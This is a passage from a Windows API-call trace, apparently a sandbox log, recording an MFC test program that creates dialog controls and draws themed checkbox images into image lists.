Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0127.883] GetPropW (hWnd=0x302cc, lpString="AfxOldWndProc423") returned 0x76a040f0 [0127.883] CallWindowProcW (lpPrevWndFunc=0x76a040f0, hWnd=0x302cc, Msg=0x287, wParam=0x21, lParam=0x0) returned 0x0 [0127.885] CallWindowProcW (lpPrevWndFunc=0x77415750, hWnd=0x402ce, Msg=0x83, wParam=0x0, lParam=0x19f86c) returned 0x0 [0127.892] CallWindowProcW (lpPrevWndFunc=0x77415750, hWnd=0x402ce, Msg=0x1, wParam=0x0, lParam=0x19f880) returned 0x0 [0127.892] CallWindowProcW (lpPrevWndFunc=0x77415750, hWnd=0x402ce, Msg=0x5, wParam=0x0, lParam=0x11b01e0) returned 0x0 [0127.892] CallWindowProcW (lpPrevWndFunc=0x77415750, hWnd=0x402ce, Msg=0x3, wParam=0x0, lParam=0x1a0003) returned 0x0 [0127.897] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x0, Size=0x60) returned 0x2094ad0 [0127.897] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x0, Size=0x204) returned 0x2094b38 [0127.897] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x0, Size=0x1c) returned 0x2094d48 [0127.897] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x0, Size=0x34) returned 0x2094d70 [0127.897] CallWindowProcW (lpPrevWndFunc=0x77415750, hWnd=0x402ce, Msg=0x30, wParam=0x40a06bf, lParam=0x0) returned 0x0 [0127.898] CallNextHookEx (hhk=0x5022d, nCode=3, wParam=0x502c8, lParam=0x19f830) returned 0x0 [0127.903] CallWindowProcW (lpPrevWndFunc=0x77415750, hWnd=0x402ce, Msg=0x55, wParam=0x502c8, lParam=0x3) returned 0x2 [0127.903] CallWindowProcW (lpPrevWndFunc=0x77415750, hWnd=0x402ce, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x0 [0127.903] CallWindowProcW (lpPrevWndFunc=0x77415750, hWnd=0x402ce, Msg=0x127, wParam=0x30001, lParam=0x0) returned 0x0 [0127.903] CallWindowProcW (lpPrevWndFunc=0x77415750, hWnd=0x402ce, Msg=0x128, wParam=0x30001, lParam=0x0) returned 0x0 [0127.905] CallNextHookEx (hhk=0x5022d, nCode=3, wParam=0x7006c, lParam=0x19f830) returned 0x0 [0127.907] CallNextHookEx (hhk=0x5022d, nCode=3, wParam=0x5002a, lParam=0x19f830) returned 0x0 [0127.909] CallWindowProcW (lpPrevWndFunc=0x77415750, hWnd=0x402ce, Msg=0x55, wParam=0x5002a, lParam=0x3) returned 0x2 [0127.909] CallWindowProcW (lpPrevWndFunc=0x77415750, hWnd=0x402ce, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x3 [0127.910] CallNextHookEx (hhk=0x5022d, nCode=3, wParam=0x202da, lParam=0x19f830) returned 0x0 [0127.912] CallWindowProcW (lpPrevWndFunc=0x77415750, hWnd=0x402ce, Msg=0x55, wParam=0x202da, lParam=0x3) returned 0x2 [0127.912] CallWindowProcW (lpPrevWndFunc=0x77415750, hWnd=0x402ce, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x3 [0127.913] GetWindowRect (in: hWnd=0x402ce, lpRect=0x19fa08 | out: lpRect=0x19fa08) returned 1 [0127.913] GetWindowLongW (hWnd=0x402ce, nIndex=-16) returned -2067136316 [0127.913] CallWindowProcW (lpPrevWndFunc=0x77415750, hWnd=0x402ce, Msg=0x110, wParam=0x502c8, lParam=0x0) [0127.913] FindResourceW (hModule=0x400000, lpName=0x66, lpType=0xf0) returned 0x0 [0127.913] GetTopWindow (hWnd=0x402ce) returned 0x502c8 [0127.913] SendMessageW (hWnd=0x502c8, Msg=0x364, wParam=0x0, lParam=0x0) returned 0x0 [0127.913] GetWindow (hWnd=0x502c8, uCmd=0x2) returned 0x7006c [0127.913] SendMessageW (hWnd=0x7006c, Msg=0x364, wParam=0x0, lParam=0x0) returned 0x0 [0127.913] GetWindow (hWnd=0x7006c, uCmd=0x2) returned 0x5002a [0127.913] SendMessageW (hWnd=0x5002a, Msg=0x364, wParam=0x0, lParam=0x0) returned 0x0 [0127.913] GetWindow (hWnd=0x5002a, uCmd=0x2) returned 0x202da [0127.913] SendMessageW (hWnd=0x202da, Msg=0x364, wParam=0x0, lParam=0x0) returned 0x0 [0127.913] GetWindow (hWnd=0x202da, uCmd=0x2) returned 0x0 [0127.913] GetDlgItem (hDlg=0x402ce, nIDDlgItem=1003) returned 0x202da [0127.913] GetDlgItem (hDlg=0x402ce, nIDDlgItem=1003) returned 0x202da [0127.913] GetParent (hWnd=0x202da) returned 0x402ce [0127.914] SetWindowLongW (hWnd=0x202da, nIndex=-4, dwNewLong=4225620) returned 1941235712 [0127.914] GetParent (hWnd=0x202da) returned 0x402ce [0127.914] GetDlgItem (hDlg=0x402ce, nIDDlgItem=1003) returned 0x202da [0127.914] GetDlgItem (hDlg=0x402ce, nIDDlgItem=1003) returned 0x202da [0127.914] SendMessageW (hWnd=0x202da, Msg=0xf1, wParam=0x1, lParam=0x0) returned 0x0 [0127.914] CallWindowProcW (lpPrevWndFunc=0x73b4e800, hWnd=0x202da, Msg=0xf1, wParam=0x1, lParam=0x0) returned 0x0 [0127.914] GetDlgItem (hDlg=0x402ce, nIDDlgItem=57670) returned 0x0 [0127.914] GetSystemMenu (hWnd=0x402ce, bRevert=0) returned 0x190197 [0127.914] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x0, Size=0x60) returned 0x2094db0 [0127.914] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x0, Size=0x204) returned 0x2094e18 [0127.914] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x0, Size=0x1c) returned 0x2095028 [0127.914] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x0, Size=0x34) returned 0x2095050 [0127.914] FindResourceW (hModule=0x400000, lpName=0x7, lpType=0x6) returned 0x43f938 [0127.914] LoadResource (hModule=0x400000, hResInfo=0x43f938) returned 0x441924 [0127.914] LockResource (hResData=0x441924) returned 0x441924 [0127.915] SizeofResource (hModule=0x400000, hResInfo=0x43f938) returned 0x162 [0127.915] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x0, Size=0x5c) returned 0x2095090 [0127.915] AppendMenuW (hMenu=0x190197, uFlags=0x800, uIDNewItem=0x0, lpNewItem=0x0) returned 1 [0127.915] AppendMenuW (hMenu=0x190197, uFlags=0x0, uIDNewItem=0x10, lpNewItem="&About CreateCheckboxImageListTest...") returned 1 [0127.915] HeapFree (in: hHeap=0x2090000, dwFlags=0x0, lpMem=0x2095090 | out: hHeap=0x2090000) returned 1 [0127.915] SendMessageW (hWnd=0x402ce, Msg=0x80, wParam=0x1, lParam=0x190205) returned 0x0 [0127.915] CallWindowProcW (lpPrevWndFunc=0x77415750, hWnd=0x402ce, Msg=0x80, wParam=0x1, lParam=0x190205) returned 0x0 [0127.918] SendMessageW (hWnd=0x402ce, Msg=0x80, wParam=0x0, lParam=0x190205) returned 0x0 [0127.918] CallWindowProcW (lpPrevWndFunc=0x77415750, hWnd=0x402ce, Msg=0x80, wParam=0x0, lParam=0x190205) returned 0x0 [0127.918] GetDlgItem (hDlg=0x402ce, nIDDlgItem=1002) returned 0x7006c [0127.919] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x0, Size=0x1504) returned 0x2095090 [0127.919] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x0, Size=0x1c) returned 0x20965a0 [0127.919] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x0, Size=0x34) returned 0x20965c8 [0127.919] GetParent (hWnd=0x7006c) returned 0x402ce [0127.919] GetWindowRect (in: hWnd=0x7006c, lpRect=0x19f5fc | out: lpRect=0x19f5fc) returned 1 [0127.919] ScreenToClient (in: hWnd=0x402ce, lpPoint=0x19f5fc | out: lpPoint=0x19f5fc) returned 1 [0127.919] ScreenToClient (in: hWnd=0x402ce, lpPoint=0x19f604 | out: lpPoint=0x19f604) returned 1 [0127.919] GetWindowLongW (hWnd=0x402ce, nIndex=-20) returned 327937 [0127.919] VirtualProtect (in: lpAddress=0x433268, dwSize=0x78a6, flNewProtect=0x40, lpflOldProtect=0x19f5f4 | out: lpflOldProtect=0x19f5f4*=0x8) returned 1 [0127.919] GetDlgItem (hDlg=0x402ce, nIDDlgItem=1002) returned 0x7006c [0127.920] GetParent (hWnd=0x7006c) returned 0x402ce [0127.920] ShowWindow (hWnd=0x7006c, nCmdShow=0) returned 1 [0127.920] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x0, Size=0x88) returned 0x2096608 [0127.923] ActivateActCtx (in: hActCtx=0x5d1dcc, lpCookie=0x19f444 | out: hActCtx=0x5d1dcc, lpCookie=0x19f444) returned 1 [0127.923] GetClassInfoW (in: hInstance=0x400000, lpClassName="AfxWnd90su", lpWndClass=0x19f48c | out: lpWndClass=0x19f48c) returned 0 [0127.923] GetLastError () returned 0x583 [0127.923] DeactivateActCtx (dwFlags=0x0, ulCookie=0x1c070015) returned 1 [0127.923] SetLastError (dwErrCode=0x583) [0127.924] ActivateActCtx (in: hActCtx=0x5d1dcc, lpCookie=0x19f44c | out: hActCtx=0x5d1dcc, lpCookie=0x19f44c) returned 1 [0127.924] RegisterClassW (lpWndClass=0x19f4dc) returned 0xc1a9 [0127.924] DeactivateActCtx (dwFlags=0x0, ulCookie=0x1c070016) returned 1 [0127.924] ActivateActCtx (in: hActCtx=0x5d1dcc, lpCookie=0x19f4d4 | out: hActCtx=0x5d1dcc, lpCookie=0x19f4d4) returned 1 [0127.924] CreateWindowExW (dwExStyle=0x200, lpClassName="AfxWnd90su", lpWindowName="", dwStyle=0x50100000, X=15, Y=41, nWidth=450, nHeight=195, hWndParent=0x402ce, hMenu=0x3e7, hInstance=0x400000, lpParam=0x0) returned 0x60138 [0127.924] ActivateActCtx (in: hActCtx=0x5d1dcc, lpCookie=0x19ed6c | out: hActCtx=0x5d1dcc, lpCookie=0x19ed6c) returned 1 [0127.924] GetParent (hWnd=0x60138) returned 0x10012 [0127.924] SetWindowLongW (hWnd=0x60138, nIndex=-4, dwNewLong=4225620) returned 1943929152 [0127.925] DeactivateActCtx (dwFlags=0x0, ulCookie=0x1c070018) returned 1 [0127.925] CallNextHookEx (hhk=0x5022d, nCode=3, wParam=0x60138, lParam=0x19eff0) returned 0x0 [0127.925] CallWindowProcW (lpPrevWndFunc=0x73de0140, hWnd=0x60138, Msg=0x81, wParam=0x0, lParam=0x19f040) returned 0x1 [0127.926] CallWindowProcW (lpPrevWndFunc=0x73de0140, hWnd=0x60138, Msg=0x83, wParam=0x0, lParam=0x19f02c) returned 0x0 [0127.927] CallWindowProcW (lpPrevWndFunc=0x73de0140, hWnd=0x60138, Msg=0x1, wParam=0x0, lParam=0x19f040) returned 0x0 [0127.927] GetClientRect (in: hWnd=0x60138, lpRect=0x209667c | out: lpRect=0x209667c) returned 1 [0127.927] GetDC (hWnd=0x60138) returned 0x10105c7 [0127.927] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x0, Size=0x60) returned 0x2096698 [0127.927] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x0, Size=0x404) returned 0x2096700 [0127.927] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x0, Size=0x1c) returned 0x2096b10 [0127.927] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x0, Size=0x34) returned 0x2096b38 [0127.927] GetSysColor (nIndex=5) returned 0xffffff [0127.927] CreateCompatibleBitmap (hdc=0x10105c7, cx=256, cy=16) returned 0x550507fb [0127.928] ImageList_Create (cx=16, cy=16, flags=0x20, cInitial=16, cGrow=1) returned 0x5ea1e0 [0127.928] CreateCompatibleDC (hdc=0x10105c7) returned 0xd0107f6 [0127.928] CreateCompatibleBitmap (hdc=0x10105c7, cx=16, cy=16) returned 0x110507f3 [0127.928] CreateCompatibleDC (hdc=0x10105c7) returned 0x200107cf [0127.928] SelectObject (hdc=0x200107cf, h=0x110507f3) returned 0x85000f [0127.929] GetProcAddress (hModule=0x73d30000, lpProcName="IsThemeActive") returned 0x73d62890 [0127.929] IsThemeActive () returned 0x1 [0127.929] GetProcAddress (hModule=0x73d30000, lpProcName="IsAppThemed") returned 0x73d625a0 [0127.929] IsAppThemed () returned 0x1 [0127.929] GetProcAddress (hModule=0x73d30000, lpProcName="OpenThemeData") returned 0x73d54220 [0127.929] OpenThemeData () returned 0x10001 [0127.929] SelectObject (hdc=0xd0107f6, h=0x550507fb) returned 0x85000f [0127.929] SetBkColor (hdc=0xd0107f6, color=0xffffff) returned 0xffffff [0127.929] ExtTextOutW (hdc=0xd0107f6, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.929] SetBkColor (hdc=0x200107cf, color=0xffffff) returned 0xffffff [0127.929] ExtTextOutW (hdc=0x200107cf, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.929] SetBkColor (hdc=0x200107cf, color=0xffffff) returned 0xffffff [0127.929] ExtTextOutW (hdc=0x200107cf, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.929] GetProcAddress (hModule=0x73d30000, lpProcName="DrawThemeBackground") returned 0x73d5b760 [0127.930] DrawThemeBackground () returned 0x0 [0127.930] GetProcAddress (hModule=0x73d30000, lpProcName="DrawThemeEdge") returned 0x73d8ca70 [0127.930] DrawThemeEdge () returned 0x0 [0127.930] StretchBlt (hdcDest=0xd0107f6, xDest=16, yDest=0, wDest=16, hDest=16, hdcSrc=0x200107cf, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.931] SetBkColor (hdc=0x200107cf, color=0xffffff) returned 0xffffff [0127.931] ExtTextOutW (hdc=0x200107cf, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.931] DrawThemeBackground () returned 0x0 [0127.931] DrawThemeEdge () returned 0x0 [0127.931] StretchBlt (hdcDest=0xd0107f6, xDest=32, yDest=0, wDest=16, hDest=16, hdcSrc=0x200107cf, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.931] SetBkColor (hdc=0x200107cf, color=0xffffff) returned 0xffffff [0127.931] ExtTextOutW (hdc=0x200107cf, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.931] DrawThemeBackground () returned 0x0 [0127.931] DrawThemeEdge () returned 0x0 [0127.931] StretchBlt (hdcDest=0xd0107f6, xDest=48, yDest=0, wDest=16, hDest=16, hdcSrc=0x200107cf, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.931] SetBkColor (hdc=0x200107cf, color=0xffffff) returned 0xffffff [0127.931] ExtTextOutW (hdc=0x200107cf, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.931] SetBkColor (hdc=0x200107cf, color=0xffffff) returned 0xffffff [0127.931] ExtTextOutW (hdc=0x200107cf, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.931] DrawThemeBackground () returned 0x0 [0127.931] DrawThemeEdge () returned 0x0 [0127.931] StretchBlt (hdcDest=0xd0107f6, xDest=80, yDest=0, wDest=16, hDest=16, hdcSrc=0x200107cf, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.931] SetBkColor (hdc=0x200107cf, color=0xffffff) returned 0xffffff [0127.931] ExtTextOutW (hdc=0x200107cf, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.931] DrawThemeBackground () returned 0x0 [0127.931] DrawThemeEdge () returned 0x0 [0127.931] StretchBlt (hdcDest=0xd0107f6, xDest=96, yDest=0, wDest=16, hDest=16, hdcSrc=0x200107cf, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.931] SetBkColor (hdc=0x200107cf, color=0xffffff) returned 0xffffff [0127.931] ExtTextOutW (hdc=0x200107cf, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.931] DrawThemeBackground () returned 0x0 [0127.931] DrawThemeEdge () returned 0x0 [0127.931] StretchBlt (hdcDest=0xd0107f6, xDest=112, yDest=0, wDest=16, hDest=16, hdcSrc=0x200107cf, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.931] SetBkColor (hdc=0x200107cf, color=0xffffff) returned 0xffffff [0127.932] ExtTextOutW (hdc=0x200107cf, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.932] SetBkColor (hdc=0x200107cf, color=0xffffff) returned 0xffffff [0127.932] ExtTextOutW (hdc=0x200107cf, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.932] DrawThemeBackground () returned 0x0 [0127.932] DrawThemeEdge () returned 0x0 [0127.932] StretchBlt (hdcDest=0xd0107f6, xDest=144, yDest=0, wDest=16, hDest=16, hdcSrc=0x200107cf, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.932] SetBkColor (hdc=0x200107cf, color=0xffffff) returned 0xffffff [0127.932] ExtTextOutW (hdc=0x200107cf, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.932] DrawThemeBackground () returned 0x0 [0127.932] DrawThemeEdge () returned 0x0 [0127.932] StretchBlt (hdcDest=0xd0107f6, xDest=160, yDest=0, wDest=16, hDest=16, hdcSrc=0x200107cf, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.932] SetBkColor (hdc=0x200107cf, color=0xffffff) returned 0xffffff [0127.932] ExtTextOutW (hdc=0x200107cf, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.932] DrawThemeBackground () returned 0x0 [0127.932] DrawThemeEdge () returned 0x0 [0127.932] StretchBlt (hdcDest=0xd0107f6, xDest=176, yDest=0, wDest=16, hDest=16, hdcSrc=0x200107cf, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.932] SetBkColor (hdc=0x200107cf, color=0xffffff) returned 0xffffff [0127.932] ExtTextOutW (hdc=0x200107cf, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.932] SetBkColor (hdc=0x200107cf, color=0xffffff) returned 0xffffff [0127.932] ExtTextOutW (hdc=0x200107cf, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.932] DrawThemeBackground () returned 0x0 [0127.932] DrawThemeEdge () returned 0x0 [0127.932] StretchBlt (hdcDest=0xd0107f6, xDest=208, yDest=0, wDest=16, hDest=16, hdcSrc=0x200107cf, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.932] SetBkColor (hdc=0x200107cf, color=0xffffff) returned 0xffffff [0127.932] ExtTextOutW (hdc=0x200107cf, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.932] DrawThemeBackground () returned 0x0 [0127.932] DrawThemeEdge () returned 0x0 [0127.932] StretchBlt (hdcDest=0xd0107f6, xDest=224, yDest=0, wDest=16, hDest=16, hdcSrc=0x200107cf, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.932] SetBkColor (hdc=0x200107cf, color=0xffffff) returned 0xffffff [0127.932] ExtTextOutW (hdc=0x200107cf, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.932] DrawThemeBackground () returned 0x0 [0127.933] DrawThemeEdge () returned 0x0 [0127.933] StretchBlt (hdcDest=0xd0107f6, xDest=240, yDest=0, wDest=16, hDest=16, hdcSrc=0x200107cf, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.933] GetProcAddress (hModule=0x73d30000, lpProcName="CloseThemeData") returned 0x73d62680 [0127.933] CloseThemeData () returned 0x0 [0127.933] SelectObject (hdc=0x200107cf, h=0x85000f) returned 0x110507f3 [0127.933] SelectObject (hdc=0xd0107f6, h=0x85000f) returned 0x550507fb [0127.933] ImageList_Add (himl=0x5ea1e0, hbmImage=0x550507fb, hbmMask=0x0) returned 0 [0127.934] DeleteDC (hdc=0x200107cf) returned 1 [0127.934] DeleteObject (ho=0x110507f3) returned 1 [0127.934] DeleteDC (hdc=0xd0107f6) returned 1 [0127.934] DeleteObject (ho=0x550507fb) returned 1 [0127.934] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x0, Size=0x60) returned 0x2096b78 [0127.934] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x0, Size=0x44) returned 0x2096be0 [0127.934] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x0, Size=0x7c) returned 0x2096c30 [0127.934] GetSysColor (nIndex=5) returned 0xffffff [0127.934] CreateCompatibleBitmap (hdc=0x10105c7, cx=512, cy=32) returned 0x560507fb [0127.935] ImageList_Create (cx=32, cy=32, flags=0x20, cInitial=16, cGrow=1) returned 0x5ea888 [0127.935] CreateCompatibleDC (hdc=0x10105c7) returned 0x130107e6 [0127.935] CreateCompatibleBitmap (hdc=0x10105c7, cx=16, cy=16) returned 0x200507cd [0127.935] CreateCompatibleDC (hdc=0x10105c7) returned 0xd0107ec [0127.935] SelectObject (hdc=0xd0107ec, h=0x200507cd) returned 0x85000f [0127.935] IsThemeActive () returned 0x1 [0127.935] IsAppThemed () returned 0x1 [0127.935] OpenThemeData () returned 0x10001 [0127.935] SelectObject (hdc=0x130107e6, h=0x560507fb) returned 0x85000f [0127.935] SetBkColor (hdc=0x130107e6, color=0xffffff) returned 0xffffff [0127.935] ExtTextOutW (hdc=0x130107e6, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.935] SetBkColor (hdc=0xd0107ec, color=0xffffff) returned 0xffffff [0127.935] ExtTextOutW (hdc=0xd0107ec, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.935] SetBkColor (hdc=0xd0107ec, color=0xffffff) returned 0xffffff [0127.936] ExtTextOutW (hdc=0xd0107ec, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.936] DrawThemeBackground () returned 0x0 [0127.936] DrawThemeEdge () returned 0x0 [0127.936] StretchBlt (hdcDest=0x130107e6, xDest=32, yDest=0, wDest=32, hDest=32, hdcSrc=0xd0107ec, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.936] SetBkColor (hdc=0xd0107ec, color=0xffffff) returned 0xffffff [0127.936] ExtTextOutW (hdc=0xd0107ec, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.936] DrawThemeBackground () returned 0x0 [0127.936] DrawThemeEdge () returned 0x0 [0127.936] StretchBlt (hdcDest=0x130107e6, xDest=64, yDest=0, wDest=32, hDest=32, hdcSrc=0xd0107ec, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.936] SetBkColor (hdc=0xd0107ec, color=0xffffff) returned 0xffffff [0127.936] ExtTextOutW (hdc=0xd0107ec, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.936] DrawThemeBackground () returned 0x0 [0127.936] DrawThemeEdge () returned 0x0 [0127.936] StretchBlt (hdcDest=0x130107e6, xDest=96, yDest=0, wDest=32, hDest=32, hdcSrc=0xd0107ec, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.936] SetBkColor (hdc=0xd0107ec, color=0xffffff) returned 0xffffff [0127.936] ExtTextOutW (hdc=0xd0107ec, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.936] SetBkColor (hdc=0xd0107ec, color=0xffffff) returned 0xffffff [0127.936] ExtTextOutW (hdc=0xd0107ec, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.936] DrawThemeBackground () returned 0x0 [0127.936] DrawThemeEdge () returned 0x0 [0127.936] StretchBlt (hdcDest=0x130107e6, xDest=160, yDest=0, wDest=32, hDest=32, hdcSrc=0xd0107ec, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.936] SetBkColor (hdc=0xd0107ec, color=0xffffff) returned 0xffffff [0127.936] ExtTextOutW (hdc=0xd0107ec, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.936] DrawThemeBackground () returned 0x0 [0127.936] DrawThemeEdge () returned 0x0 [0127.936] StretchBlt (hdcDest=0x130107e6, xDest=192, yDest=0, wDest=32, hDest=32, hdcSrc=0xd0107ec, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.936] SetBkColor (hdc=0xd0107ec, color=0xffffff) returned 0xffffff [0127.936] ExtTextOutW (hdc=0xd0107ec, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.936] DrawThemeBackground () returned 0x0 [0127.937] DrawThemeEdge () returned 0x0 [0127.937] StretchBlt (hdcDest=0x130107e6, xDest=224, yDest=0, wDest=32, hDest=32, hdcSrc=0xd0107ec, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.937] SetBkColor (hdc=0xd0107ec, color=0xffffff) returned 0xffffff [0127.937] ExtTextOutW (hdc=0xd0107ec, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.937] SetBkColor (hdc=0xd0107ec, color=0xffffff) returned 0xffffff [0127.937] ExtTextOutW (hdc=0xd0107ec, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.937] DrawThemeBackground () returned 0x0 [0127.937] DrawThemeEdge () returned 0x0 [0127.937] StretchBlt (hdcDest=0x130107e6, xDest=288, yDest=0, wDest=32, hDest=32, hdcSrc=0xd0107ec, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.937] SetBkColor (hdc=0xd0107ec, color=0xffffff) returned 0xffffff [0127.937] ExtTextOutW (hdc=0xd0107ec, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.937] DrawThemeBackground () returned 0x0 [0127.937] DrawThemeEdge () returned 0x0 [0127.937] StretchBlt (hdcDest=0x130107e6, xDest=320, yDest=0, wDest=32, hDest=32, hdcSrc=0xd0107ec, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.937] SetBkColor (hdc=0xd0107ec, color=0xffffff) returned 0xffffff [0127.937] ExtTextOutW (hdc=0xd0107ec, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.937] DrawThemeBackground () returned 0x0 [0127.937] DrawThemeEdge () returned 0x0 [0127.937] StretchBlt (hdcDest=0x130107e6, xDest=352, yDest=0, wDest=32, hDest=32, hdcSrc=0xd0107ec, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.937] SetBkColor (hdc=0xd0107ec, color=0xffffff) returned 0xffffff [0127.937] ExtTextOutW (hdc=0xd0107ec, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.937] SetBkColor (hdc=0xd0107ec, color=0xffffff) returned 0xffffff [0127.937] ExtTextOutW (hdc=0xd0107ec, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.937] DrawThemeBackground () returned 0x0 [0127.937] DrawThemeEdge () returned 0x0 [0127.937] StretchBlt (hdcDest=0x130107e6, xDest=416, yDest=0, wDest=32, hDest=32, hdcSrc=0xd0107ec, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.937] SetBkColor (hdc=0xd0107ec, color=0xffffff) returned 0xffffff [0127.937] ExtTextOutW (hdc=0xd0107ec, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.937] DrawThemeBackground () returned 0x0 [0127.937] DrawThemeEdge () returned 0x0 [0127.938] StretchBlt (hdcDest=0x130107e6, xDest=448, yDest=0, wDest=32, hDest=32, hdcSrc=0xd0107ec, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.938] SetBkColor (hdc=0xd0107ec, color=0xffffff) returned 0xffffff [0127.938] ExtTextOutW (hdc=0xd0107ec, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.938] DrawThemeBackground () returned 0x0 [0127.938] 